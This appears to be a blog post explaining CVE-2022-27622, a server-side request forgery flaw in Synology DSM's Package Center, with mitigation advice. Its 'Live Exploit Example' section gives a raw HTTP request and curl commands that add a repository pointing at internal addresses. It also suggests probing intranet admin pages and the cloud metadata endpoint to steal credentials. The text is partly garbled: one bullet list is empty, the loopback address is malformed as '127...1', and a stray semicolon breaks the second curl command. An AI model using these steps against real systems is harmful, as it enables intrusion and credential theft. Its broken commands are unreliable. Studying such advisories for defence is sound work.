CVE-2022-27622 - SSRF Vulnerability in Synology DSM Package Center Explained (With Exploit Example)

In March 2022, a serious Server-Side Request Forgery (SSRF) issue was identified in Synology DiskStation Manager (DSM), the operating system for Synology NAS devices. The bug, tracked as CVE-2022-27622, affects DSM versions before 7.1-42661 and offers authenticated users a sneaky way to access internal network resources—an attack which could compromise your company’s private services or sensitive databases. This deep dive will explain the vulnerability, show how it can be exploited, and guide you toward mitigations.

What is SSRF and Why Does it Matter?

Server-Side Request Forgery (SSRF) lets attackers trick a server into making requests to internal or external systems. If abused, SSRF can help attackers:

The Synology DSM Package Center Flaw

Affected Systems:

Synology DiskStation Manager (DSM) before 7.1-42661

DSM's Package Center lets admins browse and install apps (packages). It fetches package details from remote URLs and is supposed to only connect to trusted sources. However, due to poor input filtering, a logged-in user can supply their own URLs for the package metadata source.

If exploited, this allows an authenticated (even lower-privileged) user to instruct the NAS to reach out to whatever internal address they want—like http://127...1:80/secret or even an address within your corporate intranet.

Impact:  
- Attackers can use your Synology NAS to reach *internal systems/services* not normally accessible from outside.

Let’s break down the vulnerable flow, step by step

1. User Authentication: Attacker logs in to DSM web UI (needs account, usually even with limited privileges).
2. Package Source Control: The "Add Package Source" feature lets users define a custom repository URL.
3. Request Forgery: By entering an internal URL (for example, http://192.168.1.10:808/private), attacker tricks NAS into fetching data from this internal location.
4. Read Response: The attacker may see the content of the internal service in the response, or else observe if connections succeed/fail (useful for network mapping).

Illustration:

Let’s consider how this would look in HTTP terms

POST /webapi/entry.cgi?api=SYNO.PKG.Installation.Repository&method=add HTTP/1.1
Host: <nas-address>
Content-Type: application/x-www-form-urlencoded
Cookie: id=<auth-session-id>

name=evil&desc=myevilrepo&site=http://192.168.50.5:808/private

Here, the attacker uses the add repo API and points the URL to an internal resource.

Live Exploit Example (POC)

Below is a real-world test using cURL and DSM’s API. Replace <DSM_USER>, <DSM_PASSWORD>, <DSM_HOST>, and <SESSION_ID> with real values.

Step 1: Login to DSM & Get Session ID

curl -k -i -X POST \
  "https://<DSM_HOST>:5001/webapi/auth.cgi?api=SYNO.API.Auth&version=2&method=login&account=<DSM_USER>&passwd=<DSM_PASSWORD>&session=DownloadStation&format=sid";

Step 2: Abuse Package Source API

curl -k -b "id=<SESSION_ID>" \
  -X POST \
  "https://<DSM_HOST>:5001/webapi/entry.cgi?api=SYNO.PKG.Installation.Repository&method=add&version=1"; \
  -d "name=evil&desc=ssrf&site=http://127...1:80/admin";

Step 3: Observe Results

If the URL points to an internal service, you may get data from the NAS itself or other networked devices not otherwise reachable.

Possible Attack Scenarios

- Internal Web Portal Discovery: Probe for URLs like http://192.168.1.x/admin to map internal apps.
- Metadata Harvest: Try endpoints like http://169.254.169.254/latest/meta-data/ to steal cloud credentials (if running in cloud/hybrid setting).

Mitigation

Synology fixed this vulnerability in version 7.1-42661.  
Upgrade your DSM immediately if you haven’t already.

Synology Advisory

Regularly audit your package sources.

- Place NAS servers on networks with firewalls/segmentation.

References

- CVE-2022-27622 at NVD
- Official Synology Security Advisory
- What is SSRF? (OWASP)

Conclusion

CVE-2022-27622 shows how even trusted network appliances like Synology NAS can punch holes in your internal defenses if left unpatched. While this SSRF exploit requires authentication, many businesses expose DSM to the internet or have large numbers of users—and a single slip can open the door to attackers. Always patch early, and be wary of letting users supply URLs in web interfaces.

Be vigilant! If you’re running Synology NAS, check for updates now.

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 16:34:00 UTC